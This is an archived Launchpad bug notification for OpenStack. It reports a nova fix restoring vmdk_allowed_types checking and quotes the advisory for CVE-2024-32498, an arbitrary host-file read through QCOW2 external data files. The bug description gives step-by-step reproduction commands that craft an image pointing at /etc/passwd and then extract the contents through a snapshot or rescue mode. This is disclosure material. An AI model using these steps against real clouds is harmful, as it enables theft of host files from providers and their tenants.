[Bug 2059809] Related fix merged to nova (unmaintained/yoga)

OpenStack Infra 2059809 at bugs.launchpad.net
Wed Aug 14 17:54:50 UTC 2024 

Reviewed:  https://review.opendev.org/c/openstack/nova/+/924084
Committed: https://opendev.org/openstack/nova/commit/3ba8ee16116e6a721413a382bbd4bcb68355cdf0
Submitter: "Zuul (22348)"
Branch:    unmaintained/yoga

commit 3ba8ee16116e6a721413a382bbd4bcb68355cdf0
Author: Dan Smith <dansmith at redhat.com>
Date:   Mon Jul 1 09:06:40 2024 -0700

    Fix vmdk_allowed_types checking
    
    This restores the vmdk_allowed_types checking in create_image()
    that was unintentionally lost by tightening the
    qemu-type-matches-glance code in the fetch patch recently. Since we
    are still detecting the format of base images without metadata, we
    would have treated a vmdk file that claims to be raw as raw in fetch,
    but then read it like a vmdk once it was used as a base image for
    something else.
    
    Conflicts:
      nova/tests/unit/virt/libvirt/test_utils.py
      nova/virt/libvirt/utils.py
    
    NOTE(elod.illes): conflicts are due to patch to consolidate image
    creation functions (I111cfc8a5eae27b15c6312957255fcf973038ddf) is only
    introduced in zed.
    
    Change-Id: I07b332a7edb814f6a91661651d9d24bfd6651ae7
    Related-Bug: #2059809
    (cherry picked from commit 08be7b2a0dc1d7728d8034bc2aab0428c4fb642e)
    (cherry picked from commit 11301e7e3f0d81a3368632f90608e30d9c647111)
    (cherry picked from commit 70a435fd519a0ebcc3ac9ad5254fefbf19c93e48)
    (cherry picked from commit f732f8476851e6272d8ad9937f54b918795844e8)
    (cherry picked from commit a2acb31d790e6cb41c067bfc0343bde274c9428c)

-- 
You received this bug notification because you are a member of Ubuntu
OpenStack, which is subscribed to Ubuntu Cloud Archive.
https://bugs.launchpad.net/bugs/2059809

Title:
  [OSSA-2024-001] Arbitrary file access through QCOW2 external data file
  (CVE-2024-32498)

Status in Cinder:
  Fix Released
Status in Ubuntu Cloud Archive:
  Fix Released
Status in Ubuntu Cloud Archive antelope series:
  Fix Released
Status in Ubuntu Cloud Archive bobcat series:
  Fix Released
Status in Ubuntu Cloud Archive caracal series:
  Fix Released
Status in Ubuntu Cloud Archive ussuri series:
  Fix Committed
Status in Ubuntu Cloud Archive yoga series:
  Fix Released
Status in Glance:
  Fix Released
Status in OpenStack Compute (nova):
  Fix Released
Status in OpenStack Security Advisory:
  Fix Released

Bug description:
  OpenStack has security vulnerability in Nova or Glance, that allows an authenticated attacker to read arbitrary files.
  QCOW2 has two mechanisms to read from another file. The backing file issue was reported and fixed with OSSA-2015-014, but the external data file was not discovered.

  Steps to Reproduce:

  - Create a disk image: `qemu-img create -f qcow2 -o data_file=abcdefghigh,data_file_raw=on disk.qcow2 1G` with `abcdefghigh` a placeholder of the same length as the file to read. `qemu-img` will zero it.
  - Replace the filename in the disk image: `sed -i "s#abcdefghigh#/etc/passwd#" disk.qcow2`.
  - Upload/register the disk image: `openstack image create --disk-format qcow2 --container-format bare --file "disk.qcow2" --private "my-image"`.
  - Create a new instance: `openstack server create --flavor "nano" --image "my-image" "my-instance"`.

  With the non-bootable instance there might be two ways to continue:

  Option 1:
  - Derive a new image: `openstack server image create --name "my-leak" "my-instance"`
  - Download the image: `openstack image save --file "leak.qcow2" "my-leak"`
  - The file content starts at guest cluster 0

  Option 2: (this is untested because I reproduced it only in a production system)
  - Reboot the instance in rescue mode: `openstack server rescue --image "cirros-0.6.2-x86_64-disk" "my-instance"`.
  - Go to the Dashboard, open the console of the instance and login to the instance.
  - Extract content from `/dev/sdb` with `cat /dev/sdb | fold -w 1024 | head -n 32`, `xxd -l 1024 -c 32 /dev/sdb` or similar methods.
  - It might be possible to write to the host file. If the disk image is mounted with `qemu-nbd`, writes go through to the external data file.

To manage notifications about this bug go to:
https://bugs.launchpad.net/cinder/+bug/2059809/+subscriptions

More information about the Ubuntu-openstack-bugs mailing list